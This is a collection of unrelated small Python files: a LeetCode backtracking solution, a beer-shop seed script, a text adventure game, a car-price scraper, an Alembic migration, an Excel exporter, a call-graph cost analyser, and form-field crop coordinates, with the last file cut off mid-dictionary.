__title__ = 'voicetools'
__version__ = '0.0.1'
__author__ = 'namco1992'
__license__ = 'Apache 2.0'

# Public API re-exports.
from voicetools.api import Wolfram, TuringRobot, BaiduVoice
from voicetools.clients import BaseClient
import voicetools.utils
from voicetools.exceptions import (
    APIError, RespError, RecognitionError, VerifyError, QuotaError)
|
__author__ = 'CLH'
'''
Given a string S, we can transform every letter individually to be lowercase or uppercase to create another string. Return a list of all possible strings we could create.
'''
class Solution(object):
    """Enumerates every letter-casing variant of a string via backtracking
    (LeetCode 784, Letter Case Permutation)."""

    def __init__(self):
        self.S = []             # input string being permuted
        self.answer = []        # current partial assignment (list of chars)
        self.total_answer = []  # all completed permutations

    def is_a_solution(self, k):
        # A complete assignment covers every character of S.
        return k == len(self.S)

    def process_solution(self):
        self.total_answer.append(''.join(self.answer))

    def constact_candiates(self, k):
        """Return the casing candidates for position k (name kept as-is
        for backward compatibility with existing callers)."""
        ch = self.S[k]
        if ch.isalpha():
            # Lowercase variant first, preserving the original emission
            # order. Using lower()/upper() instead of the original ASCII
            # +/-32 arithmetic also handles non-ASCII letters correctly.
            return [ch.lower(), ch.upper()]
        return [ch]

    def backtrack(self, k):
        """Fill positions k.. of the answer, recording complete strings."""
        if self.is_a_solution(k):
            self.process_solution()
            return
        for ch in self.constact_candiates(k):
            self.answer.append(ch)
            self.backtrack(k + 1)
            self.answer.pop()

    def letterCasePermutation(self, S):
        """
        :type S: str
        :rtype: List[str]
        """
        # Reset state so repeated calls on the same instance do not
        # accumulate results from earlier inputs (bug in the original).
        self.S = S
        self.answer = []
        self.total_answer = []
        self.backtrack(0)
        return self.total_answer
# 简单解法
# def letterCasePermutation(self, S):
# ans = [[]]
#
# for char in S:
# n = len(ans)
# if char.isalpha():
# for i in range(n):
# ans.append(ans[i][:])
# ans[i].append(char.lower())
# ans[n+i].append(char.upper())
# else:
# for i in range(n):
# ans[i].append(char)
# # temp = list(map("".join, ans))
# # print(temp)
# return list(map("".join, ans))
if __name__ == "__main__":
    # Quick demo: all casings of "a1b2".
    solver = Solution()
    print(solver.letterCasePermutation("a1b2"))
import pdb
from models.beer import Beer
from models.brewer import Brewer
import repositories.brewer_repository as brewer_repository
import repositories.beer_repository as beer_repository
# Seed script: wipe both tables and repopulate with two brewers and three
# beers for development/demo use.
# Beers are deleted first — presumably beer rows reference brewers, so the
# delete order avoids dangling foreign keys (confirm against the schema).
brewer_repository.delete_all()
beer_repository.delete_all()

brewer1 = Brewer('Fallen Brewing',
                 "Unrefined, Vegan friendly beer from Glasgow. Made with 100% renewable energy.")
brewer_repository.save(brewer1)

brewer2 = Brewer('Harviestoun Brewery',
                 'Established brewery using ingredients from the Scottish Highlands.')
brewer_repository.save(brewer2)

# Beer(name, description, style, stock, cost, price, image_url, brewer) —
# positional meaning inferred from values; TODO confirm against models.beer.
beer1 = Beer("Chew Chew", "Sweet, chewy stout with sugar.",
             "Stout", 15, 2.50, 3.10, "https://www.fallenbrewing.co.uk/wp-content/uploads/2020/08/ChewChew_440.png", brewer1)
beer_repository.save(beer1)

beer2 = Beer('Schiehallion', 'Crisp lager with refreshing notes.',
             'Lager', 25, 1.90, 3.50, "https://harviestoun.com/wp-content/uploads/2019/07/HARVIE_BOTTLES_Schiehallion_V01_UPDATE-new.png", brewer2)
beer_repository.save(beer2)

beer3 = Beer('Bitter and Twisted', 'Sweet malt and bitter hops in one bottle. Full bodied light ale style with a punch.',
             'Golden Ale', 10, 1.75, 3.00, "https://harviestoun.com/wp-content/uploads/2019/07/HARVIE_BitterNTwisted-new.png", brewer2)
beer_repository.save(beer3)
|
# Text-based adventure game - Viet Hoang Cao
def game_over():
    """Print the game-over message shown whenever the player is defeated."""
    print("I'm sorry that you were defeated while this game has not been completed yet so fingers cross for you next time")
# BUG FIX: the original called game_over() here at import time, printing the
# defeat message before the game even started; that stray call is removed.
def treasure_room_1(): # alone
    """Final boss fight for a player who arrives without the polar bear."""
    print("After all, this game has almost came to an end. However, it is not over yet. After entering the treasure room, a dragon is waiting for you.")
    print("Similar to previous challenges, you have two options to defeat the dragon. 1). Kill it slowly with your bow and arrows or 2). Take full advantage of your special abilities")
    choice_3 = int(input("Which option will you choose to defeat the final boss").strip())
    if choice_3 == 1:
        print("That is a great decision. You have defeated the cold-blooded dragon")
    elif choice_3 == 2:
        print("You have been defeated by the dragon. It is so strong that it is immune to your special abilities")
        # BUG FIX: game_over() was called unconditionally, so even a winning
        # player saw the defeat epilogue; it now runs only on a loss, matching
        # the structure of lion_room()/tiger_room().
        game_over()
def treasure_room_2(): # with polar bear
    """Final boss fight for a player accompanied by the polar bear."""
    print("After all, this game has almost come to an end. However, it is not over yet. After entering the treasure room, a dragon is waiting for you.")
    print("Similar to previous challenges, you have two options to defeat the dragon. 1). Kill it slowly with your bow and arrows and ask the polar bear for help or 2). Take full advantage of your special abilities")
    choice_4 = int(input("Which option will you choose to defeat the final boss? ").strip())
    if choice_4 == 1:
        print("That is a great decision. You have defeated the final boss thanks to the polar bear and your special archery talent")
    elif choice_4 == 2:
        print("You have been defeated by the dragon. It is so strong that it is immune to your special abilities")
        # BUG FIX: game_over() was called unconditionally, so even a winning
        # player saw the defeat epilogue; it now runs only on a loss.
        game_over()
def lion_room():
    """Lion encounter: sneaking past (1) survives, attacking (2) loses."""
    print("So you have entered the lion room. A lion is sleeping very well at the end of the room")
    print("You have two options. 1). Walk past the lion silently and 2). Kill the lion")
    decision = int(input("Which option will you go for? 1 or 2").strip())
    if decision == 1:
        print("Great choice. The lion can't notice you at all")
        # Sneaking in alone leads to the solo boss fight.
        treasure_room_1()
    elif decision == 2:
        print("That's bad luck. The lion has been very hungry over the last few days.")
        game_over()
def tiger_room():
    """Tiger encounter: running (1) loses, helping the polar bear (2) wins."""
    print("So you have entered the tiger room. A tiger is fighting with a polar bear right at the center of room")
    print("Would you rather: 1). Run quickly across the room? and 2). Help the polar bear by shooting your bow to the tiger?")
    decision = int(input("Which option will you go for ? 1 or 2").strip())
    if decision == 1:
        print("Unfortunately you attract both of them and they kill you.")
        game_over()
    elif decision == 2:
        print("That's an outstanding decision. The polar becomes your loyal companion until the end")
        # Winning the bear's loyalty leads to the assisted boss fight.
        treasure_room_2()
def main_game():
    """Ask which room to enter and dispatch to the matching encounter."""
    print("You are standing in front of two rooms. One is the lion room and the other is the tiger room.")
    room = input("Which door do you want to get inside? ").lower().strip()
    if room == "lion room":
        lion_room()
    elif room == "tiger room":
        tiger_room()
    else:
        # The original silently returned on a typo; tell the player instead,
        # matching the invalid-input handling in start_game().
        print("Invalid input. You can only enter lion room or tiger room")
def start_game():
    """Greet the player and launch the main game once they confirm."""
    answer = input("Welcome to my text-based adventure game. Are you ready? ").title().strip()
    if answer == "Yes":
        print("I hope you will have an enjoyable time experiencing my text-based adventure game. Now, let's get the ball rolling. ")
        main_game()
    elif answer == "No":
        print("Then just take your time to prepare. Don't worry ! ")
    else:
        print("Invalid input. You can only enter yes or no")
# Top-level replay loop: keep starting new games until the player says "no".
# Any answer other than "yes"/"no" simply restarts the loop as well.
while True:
    start_game()
    replay = input("Would you want to try this game again?").lower().strip()
    if replay == "yes":
        continue
    elif replay == "no":
        print("Thank you very much for playing. See you next time ")
        break
#Connection persistence strategy adapted from @vincent31337, Stack Overflow:
#https://stackoverflow.com/questions/55523299/best-practices-for-persistent-database-connections-in-python-when-using-flask
from flaskr.db import MoviebuffDB
from flaskr.cosmos import MoviebuffCosmos
from flaskr.mongo import MongoDB
# Module-level singletons: one connection wrapper per backend, created once
# at import so every request handler reuses the same persistent connection
# (per the persistence-strategy reference cited at the top of this file).
db = MoviebuffDB()
cosmos_db = MoviebuffCosmos()
mongo_db = MongoDB()
|
from django.conf.urls import patterns, url
from places import views
# URL routes for the places app: index, detail by primary key, and a
# creation form.
# NOTE(review): django.conf.urls.patterns() was deprecated in Django 1.8 and
# removed in 1.10 — migrating to a plain list of url()/path() entries is
# required on newer Django. Also note "creat_new_place" (sic) is both the
# public URL path and the reverse() name, so the typo cannot be fixed here
# without breaking existing links and templates.
urlpatterns = patterns('',
    url(r'^$', views.IndexView.as_view(), name='index'),
    url(r'^(?P<pk>\d+)/$', views.PlaceDetailView.as_view(), name='place_detail'),
    url(r'^creat_new_place/$', views.NewPlaceCreateView.as_view(), name='creat_new_place'),
)
from selenium import webdriver
from bs4 import BeautifulSoup
import pandas as pd
from time import sleep
import re
import json
import requests
import sys
import datetime
# Scrape autotempest.com listings for a given make/model/zip and append the
# results to <model>_prices.csv. Requires a local chromedriver.
arguments = sys.argv
# - TODO --
# - add command line arguments to choose what call is being searched for
# - process data
# - averages for the year
# - graphs
# - do the work headless (don't open a browser window)
# r = requests.get('https://www.autotempest.com/results?make=lexus&model=gsf&zip=60004')
# data = r.json()
# print(json.dumps(data.popitem(), indent=2))
# Parallel lists: index k across all of these describes one listing.
titles = []
years = []
prices = []
mileages = []
locations = []
links = []
make = ''
model = ''
# NOTE(review): `zip` shadows the builtin of the same name for the rest of
# this script; renaming (e.g. zip_code) would be the full fix.
zip = ''
trim = ''
# not enough arguments provided
if len(arguments) < 4:
    # Default search: Lexus GS F near 60004.
    make = 'lexus'
    model = 'gsf'
    zip = '60004'
else:
    make = arguments[1].lower()
    model = arguments[2].lower()
    if len(arguments) == 4:
        zip = arguments[3]
    elif len(arguments) == 5:
        # NOTE(review): `trim` is collected but never used in the URL below
        # — TODO wire it into the query string.
        trim = arguments[3]
        zip = arguments[4]
    else:
        print(arguments)
# Locale-formatted date stamp recorded with every row.
date = datetime.datetime.now().strftime('%x')
driver = webdriver.Chrome('/usr/local/bin/chromedriver')
url = 'https://www.autotempest.com/results?make=' + make.lower() + '&model=' + model + '&zip=' + zip
# driver.get('https://www.autotempest.com/results?make=lexus&model=gsf&zip=60004')
driver.get(url)
sleep(5)
content = driver.page_source
# open the webpage
soup = BeautifulSoup(content, features="html.parser")
# wait for the webpage to load
sleep(5)
# pull the 'result-list-item' elements from the page
# 'result-list-item' is the common element among each posting in the page
results = soup.findAll('li', attrs={'class':'result-list-item'})
# regular expression for finding the model year
regex = re.compile(r"[0-9]{4}")
print('Found ', len(results), ' entries...')
# iterate through the results to extract information
for item in results:
    description = item.find("span", class_="title-wrap")
    # extract the title
    title = description.find("a", class_="listing-link").text.strip()
    # extract the year (first 4-digit run in the title; assumes one exists,
    # otherwise match.group() raises — TODO confirm listings always have it)
    match = re.search(regex, title)
    year = str(match.group(0))
    # add year and title to respective list
    years.append(year)
    titles.append(title.replace(year + ' ', ''))
    # extract the price, if it doesn't exists, enter 'N/A' as a placeholder
    # NOTE(review): the bare excepts also swallow unrelated parse errors.
    try:
        prices.append(item.find("div", class_="price").text.strip())
    except:
        prices.append("N/A")
    # extract the mileage, if it doesn't exists, enter 'N/A' as a placeholder
    try:
        mileages.append(item.find("span", class_="info mileage").text)
    except:
        mileages.append("N/A")
    locations.append(item.find("span", class_="location-info-wrap").text.strip())
    links.append(item.find('a', href=True)['href'])
# One identical date stamp per scraped row.
dates = [date]*len(results)
# display the extracted information
for k in range(0, len(results)):
    print(dates[k], '\t', years[k], '\t', titles[k], '\t', prices[k], '\t', mileages[k], '\t', locations[k], '\t', links[k])
print("Num results: ", len(results))
# store the extracted information in a dataframe
df = pd.DataFrame({'Date': dates, 'Car': titles, 'Year': years, 'Price': prices, 'Mileage': mileages, 'Location': locations, 'URL': links})
csv_title = model + '_prices.csv'
# mode='a': rows accumulate across runs (header is rewritten each run).
df.to_csv(csv_title, mode='a', encoding='utf-8', index=False)
driver.close()
"""add_project
Revision ID: c0acc1e1a1b5
Revises: 675cea0bd5a0
Create Date: 2019-09-25 11:16:04.135133
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'c0acc1e1a1b5'        # id of this migration
down_revision = '675cea0bd5a0'   # parent migration this one applies on top of
branch_labels = None
depends_on = None
def upgrade():
    """Apply this migration: create the ``projects_project`` table."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('projects_project',
    sa.Column('deleted', sa.Boolean(), server_default='FALSE', nullable=False),  # soft-delete flag
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=100), nullable=False),
    sa.Column('slug', sa.String(length=100), nullable=False),
    sa.PrimaryKeyConstraint('id')
    )
    # ### end Alembic commands ###
def downgrade():
    """Revert this migration: drop the ``projects_project`` table."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_table('projects_project')
    # ### end Alembic commands ###
|
# encoding: utf-8
import xlrd
import sys
from sheet import shm
args = {}
def export_single_book():
    """Export every non-reference sheet of the input workbook to .py/.json/.lua.

    Reads the workbook path from ``args.input`` and writes one file per
    format next to ``args.output`` + sheet name.
    """
    file_path = args.input
    output_path = args.output
    shm.add_work_book(file_path)
    for sheet_name in shm.get_sheet_name_list():
        if shm.is_ref_sheet(sheet_name):
            continue
        print('Exporting: %s' % sheet_name)
        # Bug fix: `file()` was removed in Python 3 -- open in binary mode and
        # write the already-encoded bytes; `with` also guarantees the handle
        # is closed on error.
        py = shm.get_sheet(sheet_name).to_python()
        with open(output_path + sheet_name + '.py', 'wb') as f:
            f.write(str(py).encode('UTF-8'))
        json_text = shm.export_json(sheet_name)
        with open(output_path + sheet_name + '.json', 'wb') as f:
            f.write(json_text.encode('UTF-8'))
        lua_text = shm.export_lua(sheet_name)
        with open(output_path + sheet_name + '.lua', 'wb') as f:
            f.write(lua_text.encode('UTF-8'))
def export_main_book():
    """Export sheets listed in a "main book" index workbook.

    The first sheet of ``args.input`` holds rows that are either
    '__workbook__' rows (remaining columns name source workbooks, loaded
    first) or sheet specs: column 0 is 'SheetName' or
    'SheetName->OutputName', the remaining non-empty columns select the
    output fields.
    """
    file_path = args.input
    output_path = args.output
    wb = xlrd.open_workbook(file_path)
    sh = wb.sheet_by_index(0)
    workbook_path_list = []
    sheet_list = []
    for row in range(sh.nrows):
        # renamed from `type`, which shadowed the builtin
        row_kind = sh.cell(row, 0).value
        if row_kind != '__workbook__':
            sheet_list.append([row_kind])
        for col in range(1, sh.ncols):
            value = sh.cell(row, col).value
            if value == '':
                continue
            if row_kind == '__workbook__':
                workbook_path_list.append(value)
            else:
                sheet_list[-1].append(value)
    for workbook_path in workbook_path_list:
        shm.add_work_book(workbook_path + '.xlsx')
    for sheet in sheet_list:
        if '->' in sheet[0]:
            sheet_name = sheet[0].split('->')[0]
            sheet_output_name = sheet[0].split('->')[1]
        else:
            sheet_output_name = sheet_name = sheet[0]
        sheet_output_field = sheet[1:]
        print('Exporting: %s -> %s' % (sheet_name, sheet_output_name))
        # Bug fix: `file()` was removed in Python 3 -- open in binary mode and
        # write the encoded bytes through a context manager.
        json_text = shm.export_json(sheet_name, sheet_output_field)
        with open(output_path + sheet_name + '.json', 'wb') as f:
            f.write(json_text.encode('UTF-8'))
        lua_text = shm.export_lua(sheet_name, sheet_output_field)
        with open(output_path + sheet_name + '.lua', 'wb') as f:
            f.write(lua_text.encode('UTF-8'))
if __name__ == '__main__':
    # CLI entry point: choose main-book vs single-book mode from -m.
    import argparse
    parser = argparse.ArgumentParser(description='Export excle to assigned file, now support [json, lua]', prog='etox')
    parser.add_argument('-v', '--version', action='version', version='%(prog)s v1.0')
    parser.add_argument('-m', help='Use mainbook mode, otherwise will use singlebook mode.', action='store_true')
    parser.add_argument("-i", '--input', help='Input filename', type=str)
    parser.add_argument("-o", '--output', help='Output filepath', type=str)
    # Rebinds the module-level `args` that the export functions read.
    args = parser.parse_args()
    if not args.m:
        export_single_book()
    else:
        export_main_book()
|
def count_ways(n, k):
    """Count subsets of {1..12} with exactly ``n`` elements summing to ``k``.

    Enumerates all 2**12 bitmasks over the values 1..12 (the original
    inline logic, extracted so it is testable and import-safe).
    """
    result = 0
    for mask in range(1 << 12):
        picked = [j + 1 for j in range(12) if mask & (1 << j)]
        if len(picked) == n and sum(picked) == k:
            result += 1
    return result


if __name__ == '__main__':
    # One line per test case: "n k"; answers printed as "#<case> <count>".
    for tc in range(int(input())):
        n, k = map(int, input().split())
        print(f'#{tc+1} {count_ways(n, k)}')
|
'''
extract communication cost between classes from workflow.csv
'''
import sys
import csv
# Module-level registries, rebound in the __main__ block and read by
# process() / formatProcess().
METHODDict = dict()  # dict[methodName] = methodID
CLASSDict = dict()  # dict[className] = classID
CLASSID2NAMEDict = dict()  # dict[classID] = className
METHODEdgeDict = dict()  # dict[mid1][mid2] = edgeIndex
METHODEdgeList = list()  # list[edgeIndex] = MethodEdge(.)
class MethodEdge:
    """One caller->callee call edge with the callee's parameter/return info."""
    def __init__(self, callerID, calleeID, para2List, return2Str):
        self.callerID = callerID      # method id of the caller
        self.calleeID = calleeID      # method id of the callee
        self.para2List = para2List    # callee parameter-type list
        self.return2Str = return2Str  # callee return type, '' when none
'''
class ComCost:
def __int__(self, className1, className2, call, para_num, ret_num, call_freq, para_num_freq, ret_num_freq, total, total_freq):
self.className1 = className1
self.className2 = className2
self.call = call
self.para_num = para_num
self.ret_num = ret_num
self.call_freq = call_freq
self.para_num_freq = para_num_freq
self.ret_num_freq = ret_num_freq
self.total = total
self.total_freq = total_freq
'''
def readCSV(fileName):
    """Parse a workflow CSV into id maps and a raw call-edge list.

    Returns (methodDict, classDict, classID2NameDict, resList) where
    resList rows are [callerID, calleeID, m2_para, m2_return, classID1,
    classID2].  Ids are assigned in first-seen order; the header row
    (traceID == 'traceID') is skipped.
    """
    methodDict = {}
    classDict = {}
    classID2NameDict = {}
    resList = []
    with open(fileName, 'r', newline="") as fp:
        for row in csv.reader(fp):
            (traceID, order, stype, callerName, calleeName, m1_para, m2_para,
             className1, className2, m1_return, m2_return, addweight) = row
            if traceID == 'traceID':
                continue  # header row
            # Method names are disambiguated by their parameter signature.
            caller = callerName + '(' + m1_para + ')'
            callee = calleeName + '(' + m2_para + ')'
            for name in (caller, callee):
                if name not in methodDict:
                    methodDict[name] = len(methodDict)
            for cname in (className1, className2):
                if cname not in classDict:
                    cid = len(classDict)
                    classDict[cname] = cid
                    classID2NameDict[cid] = cname
            resList.append([methodDict[caller], methodDict[callee],
                            m2_para, m2_return,
                            classDict[className1], classDict[className2]])
    return methodDict, classDict, classID2NameDict, resList
def getParalist(m2_para):
    """Split a comma-separated parameter string; '' maps to an empty list."""
    parts = m2_para.split(',')
    return [] if parts[0] == '' else parts
def genMethodEdge(initList):
    """Build the caller->callee edge index and edge list.

    Returns (methodEdgeDict, methodEdgeList) where
    methodEdgeDict[m1][m2] is the index of the corresponding MethodEdge in
    methodEdgeList.  Only the first occurrence of a (m1, m2) pair creates
    an edge; repeats are ignored here (frequency is counted in process()).
    """
    methodEdgeDict = {}
    methodEdgeList = []
    for methodID1, methodID2, m2_para, m2_return, classID1, classID2 in initList:
        targets = methodEdgeDict.setdefault(methodID1, {})
        if methodID2 not in targets:
            targets[methodID2] = len(methodEdgeList)
            methodEdgeList.append(
                MethodEdge(methodID1, methodID2, getParalist(m2_para), m2_return))
    return methodEdgeDict, methodEdgeList
# Counts every call edge, including calls between methods of the same class
# (same-class pairs are filtered out later in formatProcess()).
def process(initList):
    """Aggregate edge frequencies per (classID1, classID2) pair.

    Returns dict[c1ID][c2ID] = {methodEdgeIndex: frequency, ...}.
    Relies on the module-level METHODEdgeDict built by genMethodEdge().
    """
    classEdgeDict = {}
    for methodID1, methodID2, m2_para, m2_return, classID1, classID2 in initList:
        edgeIndex = METHODEdgeDict[methodID1][methodID2]
        counts = classEdgeDict.setdefault(classID1, {}).setdefault(classID2, {})
        counts[edgeIndex] = counts.get(edgeIndex, 0) + 1
    return classEdgeDict
# Input shape: dict[c1ID][c2ID] = {methodEdgeIndex: freq, ...}
# NOTICE: class-to-itself edges are excluded from the output.
def formatProcess(classEdgeDict):
    """Flatten the per-class-pair edge counts into output rows.

    Each row is [className1, className2, call, para_num, ret_num,
    call_freq, para_num_freq, ret_num_freq, total, total_freq], where the
    *_freq columns weight each distinct edge by its observed frequency.
    Relies on the module-level METHODEdgeList and CLASSID2NAMEDict.
    """
    resList = []
    for cid1, targets in classEdgeDict.items():
        for cid2, edgeFreqs in targets.items():
            if cid1 == cid2:  # exclude a class calling itself
                continue
            calls = calls_f = 0
            params = params_f = 0
            rets = rets_f = 0
            for edgeIdx, freq in edgeFreqs.items():
                edge = METHODEdgeList[edgeIdx]
                p = len(edge.para2List)
                r = 0 if edge.return2Str == '' else 1
                calls += 1
                calls_f += freq
                params += p
                params_f += p * freq
                rets += r
                rets_f += r * freq
            resList.append([CLASSID2NAMEDict[cid1], CLASSID2NAMEDict[cid2],
                            calls, params, rets,
                            calls_f, params_f, rets_f,
                            rets + params, rets_f + params_f])
    return resList
def writeCSV(listlist, fileName):
    """Write rows under the fixed communication-cost header, then echo the path."""
    header = ['className1', 'className2', 'call', 'p_num', 'r_num',
              'call_f', 'p_num_f', 'r_num_f', 'total', 'total_f']
    with open(fileName, 'w', newline="") as fp:
        writer = csv.writer(fp)
        writer.writerow(header)
        writer.writerows(listlist)
    print(fileName)
#python pro.py workflow.csv outfile.csv
if __name__ == '__main__':
    # usage: python pro.py <workflow.csv> <outfile.csv>
    workflowFileName = sys.argv[1]
    outfileName = sys.argv[2]
    # Rebind the module-level registries so process()/formatProcess() see them.
    [METHODDict, CLASSDict, CLASSID2NAMEDict, initEdgeList] = readCSV(workflowFileName)
    [METHODEdgeDict, METHODEdgeList] = genMethodEdge(initEdgeList)
    #dict[c1ID][c2ID] = [MethodEdge1: freq1, MethodEdge2:freq2, ...]
    classEdgeDict = process(initEdgeList)
    resultList = formatProcess(classEdgeDict)
    writeCSV(resultList, outfileName)
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 24 15:19:51 2018
@author: Brandon Croarkin
"""
from PIL import Image
import os
import re
#listing out the (x1, y1, x2, y2) coordinates of information on each of
#the different forms
# NOTE(review): `width` and `height` are not bound anywhere before these
# module-level dicts (they are only assigned inside the second __main__
# block at the bottom of the file), so importing this module as-is raises
# NameError -- confirm where they are meant to be defined.
# Field crop boxes for the 02/02/09 revision of the form, as fractions of
# the page size.
image_coords_020209 = {'LastName':(.055*width,.168*height,.37*width,.205*height),
'FirstName': (.368*width,.169*height,.61*width,.205*height),
'DateOfBirth': (.688*width,.205*height,.95*width,.240*height),
'SocialSecurity': (.688*width,.241*height,.95*width,.275*height),
'Attestation': (.49*width,.292*height,.515*width,.365*height),
'Alien/AdmissionNo1': (.515*width,.325*height,.945*width,.350*height),
'Alien/AdmissionNo2': (.515*width,.346*height,.945*width,.365*height),
'StreetAddress': (.055*width,.205*height,.58*width,.240*height),
'City': (.055*width,.241*height,.35*width,.275*height),
'State': (.345*width,.241*height,.58*width,.275*height),
'Zip': (.58*width,.241*height,.688*width,.275*height),
'WorkAuthorization': (.515*width,.362*height,.945*width,.377*height),
'Translator': (.513*width,.433*height,.94*width,.47*height),
'DocumentTitle1': (.05*width,.564*height,.363*width,.59*height),
'DocumentTitle2': (.38*width,.564*height,.65*width,.59*height),
'DocumentTitle3': (.7*width,.564*height,.95*width,.59*height),
'DocumentNumber1': (.05*width,.606*height,.363*width,.63*height),
'DocumentNumber2': (.38*width,.606*height,.65*width,.63*height),
'DocumentNumber3': (.7*width,.606*height,.95*width,.63*height),
'DocumentNumber4': (.05*width,.645*height,.363*width,.665*height),
'DateOfHire': (.053*width,.712*height,.278*width,.728*height),
'MiddleInitial': (.610*width,.169*height,.686*width,.205*height),
'ApartmentNo': (.58*width,.205*height,.685*width,.240*height)}
# Crop-box templates for the 03/08/13 revision (pages 1 and 2).
# All boxes are still empty placeholders awaiting measurement.
image_coords_030813_pg1 = {'LastName':(),
'FirstName': (),
'DateOfBirth': (),
'SocialSecurity': (),
'Attestation': (),
'Alien/AdmissionNo1': (),
'Alien/AdmissionNo2': (),
'StreetAddress': (),
'City': (),
'State': (),
'Zip': (),
'WorkAuthorization': (),
'Translator': (),
'DocumentTitle1': (),
'DocumentTitle2': (),
'DocumentTitle3': (),
'DocumentNumber1': (),
'DocumentNumber2': (),
'DocumentNumber3': (),
'DocumentNumber4': (),
'DateOfHire': (),
'MiddleInitial': (),
'ApartmentNo': ()}
image_coords_030813_pg2 = {'LastName':(),
'FirstName': (),
'DateOfBirth': (),
'SocialSecurity': (),
'Attestation': (),
'Alien/AdmissionNo1': (),
'Alien/AdmissionNo2': (),
'StreetAddress': (),
'City': (),
'State': (),
'Zip': (),
'WorkAuthorization': (),
'Translator': (),
'DocumentTitle1': (),
'DocumentTitle2': (),
'DocumentTitle3': (),
'DocumentNumber1': (),
'DocumentNumber2': (),
'DocumentNumber3': (),
'DocumentNumber4': (),
'DateOfHire': (),
'MiddleInitial': (),
'ApartmentNo': ()}
# Field crop boxes for the 05/07/87 revision, as fractions of the page size.
# Bug fix: the DocumentNumber1/DocumentNumber2 values were bare
# comma-separated expressions without parentheses, which is a SyntaxError
# inside a dict literal -- wrapped them in tuples like every other entry.
image_coords_050787 = {'LastName':(.069*width,.1215*height,.38*width,.1525*height),
'FirstName': (.38*width,.1215*height,.56*width,.1525*height),
'DateOfBirth': (.07*width,.1819*height,.51*width,.211*height),
'SocialSecurity': (.51*width,.1819*height,.91*width,.211*height),
'Attestation': (.085*width,.228*height,.12*width,.275*height),
'Alien/AdmissionNo1': (.503*width,.24*height,.655*width,.26*height),
'Alien/AdmissionNo2': (.732*width,.26*height,.911*width,.276*height),
'Alien/AdmissionNo3': (.235*width,.2735*height,.369*width,.29*height),
'StreetAddress': (.08*width,.1519*height,.38*width,.182*height),
'City': (.38*width,.1519*height,.56*width,.182*height),
'State': (.56*width,.1519*height,.735*width,.182*height),
'Zip': (.735*width,.1519*height,.92*width,.182*height),
'WorkAuthorization': (),
'Translator': (.51*width,.394*height,.833*width,.424*height),
'DocumentTitle1': (.06*width,.632*height,.09*width,.72*height),
'DocumentTitle2': (.38*width,.61*height,.4*width,.73*height),
'DocumentTitle3': (.7*width,.61*height,.72*width,.73*height),
'DocumentNumber1': (.076*width,.782*height,.315*width,.8*height),
'DocumentNumber2': (.3913*width,.782*height,.63*width,.8*height),
'DocumentNumber3': (.712*width,.782*height,.95*width,.8*height),
'DateOfHire': (.785*width,.925*height,.95*width,.953*height),
'MiddleInitial': (.56*width,.1215*height,.74*width,.1525*height)}
# Crop-box template for the 05/31/05 revision; boxes not yet measured.
# (This template has no DocumentNumber keys, unlike its siblings.)
image_coords_053105 = {'LastName':(),
'FirstName': (),
'DateOfBirth': (),
'SocialSecurity': (),
'Attestation': (),
'Alien/AdmissionNo1': (),
'Alien/AdmissionNo2': (),
'StreetAddress': (),
'City': (),
'State': (),
'Zip': (),
'WorkAuthorization': (),
'Translator': (),
'DocumentTitle1': (),
'DocumentTitle2': (),
'DocumentTitle3': (),
'DateOfHire': (),
'MiddleInitial': (),
'ApartmentNo': ()}
# Field crop boxes for the 06/05/07 revision, as fractions of the page size.
# Bug fixes: (1) the 'TranslatorSignDate' entry was missing its trailing
# comma, a SyntaxError in a dict literal; (2) the DocumentNumber1-4 keys
# appeared twice with identical empty values -- duplicate dict keys are
# silently overwritten, so the redundant set is dropped (no behavior change).
image_coords_060507 = {'LastName':(.055*width,.185*height,.36*width,.221*height),
'FirstName': (.36*width,.185*height,.58*width,.221*height),
'DateOfBirth': (.69*width,.2215*height,.95*width,.25*height),
'SocialSecurity': (.688*width,.257*height,.94*width,.291*height),
'Attestation': (.45*width,.306*height,.4752*width,.355*height),
'Alien/AdmissionNo1': (.71*width,.318*height,.95*width,.332*height),
'Alien/AdmissionNo2': (.61*width,.351*height,.95*width,.37*height),
'StreetAddress': (.055*width,.2215*height,.57*width,.2454*height),
'City': (.055*width,.257*height,.35*width,.291*height),
'State': (.35*width,.257*height,.57*width,.291*height),
'Zip': (.58*width,.257*height,.685*width,.291*height),
'WorkAuthorization': (.652*width,.334*height,.95*width,.351*height),
'TranslatorName': (.515*width,.433*height,.88*width,.469*height),
'TranslatorAddress': (.1*width,.47*height,.677*width,.497*height),
'TranslatorSignDate': (.678*width,.47*height,.9*width,.497*height),
'DocumentTitle1': (.14*width,.57*height,.36*width,.59*height),
'DocumentTitle2': (),
'DocumentTitle3': (),
'DocumentNumber1': (),
'DocumentNumber2': (),
'DocumentNumber3': (),
'DocumentNumber4': (),
'DateOfHire': (),
'MiddleInitial': (.58*width,.185*height,.685*width,.221*height),
'ApartmentNo': (.58*width,.2215*height,.685*width,.2454*height)}
# Crop-box templates for the 08/07/09 and 11/14/16 (pages 1-2) revisions.
# All boxes are still empty placeholders awaiting measurement.
image_coords_080709 = {'LastName':(),
'FirstName': (),
'DateOfBirth': (),
'SocialSecurity': (),
'Attestation': (),
'Alien/AdmissionNo1': (),
'Alien/AdmissionNo2': (),
'StreetAddress': (),
'City': (),
'State': (),
'Zip': (),
'WorkAuthorization': (),
'Translator': (),
'DocumentTitle1': (),
'DocumentTitle2': (),
'DocumentTitle3': (),
'DocumentNumber1': (),
'DocumentNumber2': (),
'DocumentNumber3': (),
'DocumentNumber4': (),
'DateOfHire': (),
'MiddleInitial': (),
'ApartmentNo': ()}
image_coords_111416_pg1 = {'LastName':(),
'FirstName': (),
'DateOfBirth': (),
'SocialSecurity': (),
'Attestation': (),
'Alien/AdmissionNo1': (),
'Alien/AdmissionNo2': (),
'StreetAddress': (),
'City': (),
'State': (),
'Zip': (),
'WorkAuthorization': (),
'Translator': (),
'DocumentTitle1': (),
'DocumentTitle2': (),
'DocumentTitle3': (),
'DocumentNumber1': (),
'DocumentNumber2': (),
'DocumentNumber3': (),
'DocumentNumber4': (),
'DateOfHire': (),
'MiddleInitial': (),
'ApartmentNo': ()}
image_coords_111416_pg2 = {'LastName':(),
'FirstName': (),
'DateOfBirth': (),
'SocialSecurity': (),
'Attestation': (),
'Alien/AdmissionNo1': (),
'Alien/AdmissionNo2': (),
